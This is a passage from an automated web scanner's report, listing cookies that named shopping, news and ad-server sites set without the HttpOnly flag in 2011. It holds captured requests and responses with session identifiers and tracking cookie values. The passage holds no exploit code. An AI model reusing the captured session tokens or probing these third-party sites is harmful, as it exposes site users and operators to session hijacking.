Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:36 PM?0&9/3/2011 6:20:18 PM?0&9/3/2011 6:20:47 PM?0&9/3/2011 6:20:56 PM?0&9/3/2011 6:21:21 PM?0&9/3/2011 6:21:23 PM?0&9/3/2011 6:21:19 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:21:19 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:21:19 GMT
Connection: close
Content-Length: 259238

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

12.16. http://www.personalcreations.com/personalized-congratulations-gifts-PCONGRA

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /personalized-congratulations-gifts-PCONGRA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-congratulations-gifts-PCONGRA HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:40 PM?0&9/3/2011 6:19:52 PM?0&9/3/2011 6:19:56 PM?0&9/3/2011 6:20:33 PM?0&9/3/2011 6:20:09 PM?0&9/3/2011 6:21:18 PM?0&9/3/2011 6:21:00 PM?0&9/3/2011 6:20:59 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:20:59 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:20:59 GMT
Connection: close
Content-Length: 404968

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

12.17. http://www.personalcreations.com/personalized-graduation-gifts-PGRADUA

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /personalized-graduation-gifts-PGRADUA

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-graduation-gifts-PGRADUA HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:36 PM?0&9/3/2011 6:20:18 PM?0&9/3/2011 6:20:47 PM?0&9/3/2011 6:20:56 PM?0&9/3/2011 6:21:21 PM?0&9/3/2011 6:21:23 PM?0&9/3/2011 6:21:19 PM?0&9/3/2011 6:22:03 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:22:03 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:22:05 GMT
Connection: close
Content-Length: 351790

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

12.18. http://www.personalcreations.com/personalized-halloween-clothes-PHALAPP

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /personalized-halloween-clothes-PHALAPP

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-halloween-clothes-PHALAPP HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:20:11 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:20:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:20:14 GMT
Connection: close
Content-Length: 333277

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

12.19. http://www.personalcreations.com/personalized-halloween-gifts-PHALLOW

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /personalized-halloween-gifts-PHALLOW

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-halloween-gifts-PHALLOW HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:18:53 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:18:54 GMT
Connection: close
Content-Length: 211789

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

12.20. http://www.personalcreations.com/personalized-halloween-treat-bags-PHALBAG

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /personalized-halloween-treat-bags-PHALBAG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-halloween-treat-bags-PHALBAG HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:35 GMT
Connection: close
Content-Length: 110641

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

12.21. http://www.personalcreations.com/personalized-housewarming-gifts-PHOUSEW

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /personalized-housewarming-gifts-PHOUSEW

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-housewarming-gifts-PHOUSEW HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:21:17 PM?0&9/3/2011 6:21:26 PM?0&9/3/2011 6:21:17 PM?0&9/3/2011 6:22:13 PM?0&9/3/2011 6:22:11 PM?0&9/3/2011 6:22:27 PM?0&9/3/2011 6:22:29 PM?0&9/3/2011 6:22:58 PM?0&9/3/2011 6:22:53 PM?0&9/3/2011 6:22:44 PM?0&9/3/2011 6:23:35 PM?0&9/3/2011 6:23:24 PM?0&9/3/2011 6:23:47 PM?0&9/3/2011 6:24:04 PM?0&9/3/2011 6:23:35 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:23:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:23:35 GMT
Connection: close
Content-Length: 319449

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

12.22. http://www.personalcreations.com/personalized-pet-gifts-PPETBSL

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /personalized-pet-gifts-PPETBSL

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-pet-gifts-PPETBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:14 PM?0&9/3/2011 6:27:54 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:10 PM?0&9/3/2011 6:29:21 PM?0&9/3/2011 6:29:12 PM?0&9/3/2011 6:29:04 PM?0&9/3/2011 6:29:29 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:29:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:29:30 GMT
Connection: close
Content-Length: 268297

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

12.23. http://www.personalcreations.com/personalized-romantic-gifts-PLARBSL

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /personalized-romantic-gifts-PLARBSL

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personalized-romantic-gifts-PLARBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:25 PM?0&9/3/2011 6:27:59 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:46 PM?0&9/3/2011 6:28:53 PM?0&9/3/2011 6:29:27 PM?0&9/3/2011 6:29:17 PM?0&9/3/2011 6:29:16 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:29:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:29:16 GMT
Connection: close
Content-Length: 310128

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

12.24. http://www.publish2.com/newsgroups/state-worker.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.publish2.com
Path:   /newsgroups/state-worker.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /newsgroups/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812&_=1315097336789 HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=9gnfjllrd20ndevbqqm9m4mf11; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=Ka5AoyopZ9kpPFa3NhsbtDXPQTEx847bVIDScsm%2BCw155MwWO5%2Bi1aulbRfAmlul4YY88KLOwbADcRPw1U9RCBn5XPQv66E5mPqC7zOCFxXtgBZa9sFWq8XJkjY%2FR0dkJTs95fKqzHW8QzisCKQqHkLPklaUEyXplD%2B9oZMRWehF%2Br2fr80fCEKujMyNVeT02rrVyIGwkFXYWdsFh5hNBxdP0EUrS4ZnmgRzr%2FTPEwIVbgkBbsogjdVLV1%2BSA9%2FBF%2B10olZ65IaRCy7Tu0MlJzQ7idWcpZoUMye0g%2BHxUC0P81tshB2%2F8%2F4Nxq7yZpQOuGG85Qlr0qyRoiwUB%2BPWn%2BeRycpTrDTNC4wqlWnTrMRWvi3HKMg%3D; path=/
Content-Type: application/json; charset=utf-8
Content-Length: 12562

jQuery15205311797398608178_1315097321812({"title":"State Worker","feedlink":"http:\/\/www.publish2.com\/newsgroups\/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812&_=1315097336
...[SNIP]...

12.25. http://ad.afy11.net/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?mode=7&publisher_dsp_id=2&external_user_id=2925993182975414771 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: image/gif
Content-Length: 45
Set-Cookie: s=1,2*4e62cac9*7ILJjOd50C*xAn6CqfjViVWUXPcP2NGnpPxnQ==*; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

GIF89a.............!.......,...........D..;if

12.26. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /server/ads.js?pub=5757418&cch=5766966&code=5766974&l=728x90&aid=26912047&ahcid=2168902&bimpd=_P8jnlWa9XstK_JlmmehibBCY86uUcZ8orSis2gk3CgGuM8NRppyPQMYvcwYVWxeqx53lV-injqapvMTqVcy93ETQudoxG65t8gPvD3_8uXTH1PXOPFQZu8QV_sfud_H-APXWDieQ47BkVHFFBn37s3aR3R9fKaUZJwqF3RKDtidgFaK5usOyzENC88rTUlt9K10asyG35OWlNfIYOZ-eD5tcSKw-zblptFUhK9YrBvJ-WVZmeLXwW90Vc9Kb9XoiPnsI1H5EzsiLAXyc7PFNmMqw1dLCgnGdMDgUmN3gwdG_Ur_2SMU4K10y_Sli8mM2o2RfArbjquS3LhtH_oucb3wc-cQ7FRKnITKYzO3zYXWG83x93SQchtOADUffiJhCEHm6r5PNXkH9qRXbUWExW_-Tu619iR6e1KbNlVj8jLndn3HHWXSm6j08SLj-h_ckdMj51v2x5gNhdpsMl_xftjg47NtKOd3aMYaFKX0mDx-mbKM0JHYn1hPNWK3mE7pzqC_aS7mkgsjA3S3GAANk8l2hYjwLveMS5-0Prm8ku-d-0Mgw9kibbpEMGHOE3HL6dCtmc69w_hrmFS4bSqF1Ubrzov4KJkplEjIfx4sijhgID_WtH2HGV-ZlBaxQA1ij1j_O9y58VxgD6JjAd6GfmoJ8UbwkKQyww1upyp3jn-KeGFWA05C4wMLlJET2Sr393OncBALoxLqvhLiy_Csz4BhnEKFF2M8my_fgvGuVC-BGn7V08Zk_msX51p9Pm_1V71_KFY8MHiZdUStS_Pc88kzr_aJ80D7tEUMLPW-_InB3ZbanTW1OTZfNoJuT_Q8bPiK77OYvzyO19oo0lS1JrBteXm6E3IqGkdPbGLUoEv66yPDCbC2aqvzIe2Oz4Dl&acp=1.72 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=undefined%7Cundefined%7Cundefined%7C4%7Cundefined%7C6; rds=undefined%7Cundefined%7Cundefined%7C15221%7Cundefined%7C15221; rv=1; uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 06 Sep 2011 00:55:06 GMT
Set-Cookie: uid=4447451951399893309; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:55:06 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pf=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: fc=C5fpYpilMyxHrPIR--3QkiHvKDNi_uncK1CZ9qMjBiHJxmeG753N3cyfpzvDjP2CIQIVonNUzt8CzdLhUy1rOScdAv5WskG6P8YmJYM-cP7i3Sy-PEwXW67DoFr3mtCG; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:55:06 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:55:05 GMT
Content-Length: 9577


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...

12.27. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?id=1166786&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; bh="b!!!!U!!-O3!!!!#=3G@^!!Os7!!!!#=3G@^!!`4x!!!!$=3Ef#!!jBx!!!!#=2srH!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#0Db!!!!#=3*$x!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#N[5!!!!#=3!ea!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#bw^!!!!#=3G@^!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#v-#!!!!#=3*$x!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$1:.!!!!#=3!ea!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^"

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:35 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
